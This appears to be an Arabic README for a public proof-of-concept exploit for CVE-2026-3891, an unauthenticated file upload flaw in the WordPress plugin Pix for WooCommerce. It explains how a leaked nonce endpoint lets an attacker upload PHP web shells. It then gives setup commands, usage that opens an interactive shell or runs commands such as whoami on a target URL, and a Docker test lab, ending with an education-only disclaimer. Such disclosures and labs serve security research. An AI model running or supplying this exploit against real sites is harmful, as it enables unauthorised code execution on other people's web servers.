
Pix for WooCommerce <= 1.5.0 - رفع ملفات تعسّفي دون مصادقة (CVE-2026-3891) PoC
CVE-2026-3891 هي ثغرة تحميل ملف تعسفي غير مصادق عليه في إضافة WordPress Pix for WooCommerce. تعرض الإضافة نقطة نهاية AJAX (lkn_pix_for_woocommerce_c6_save_settings) تقبل تحميل ملفات الشهادات دون أي مصادقة. يمكن الحصول على nonce بدون مصادقة عبر نقطة نهاية ثانية مكشوفة (lkn_pix_for_woocommerce_generate_nonce)، مما يسمح لمهاجم غير مصادق تمامًا بتحميل ملفات تعسفية — بما في ذلك قذائف الويب PHP — مباشرة إلى جذر الويب.
الإصدارات المتأثرة: payment-gateway-pix-for-woocommerce <= 1.5.0
--commandgit clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 CVE-2026-3891.py --url <TARGET_URL> [--command <CMD>] [--timeout <SECONDS>] [--useragent <UA>]
استغل الهدف وادخل إلى جلسة قشرة تفاعلية دائمة لتشغيل أوامر متعددة.
python3 CVE-2026-3891.py --url 'https://target.com'

شغّل أمرًا واحدًا على الهدف واطبع المخرجات، مفيد للأتمتة أو الفحوصات السريعة.
python3 CVE-2026-3891.py --url 'https://target.com' --command whoami
Single command
بيئة Docker Compose ذاتية الاحتواء مع البرنامج الثغري للاختبار المحلي. راجع DOCKER.md لمزيد من التفاصيل
cd docker/
docker compose up -d
python3 CVE-2026-3891.py --url 'http://localhost:8080'
تم توفير هذه الأداة للأغراض التعليمية والبحثية فقط. لا يتحمل المنشئ أي مسؤولية عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.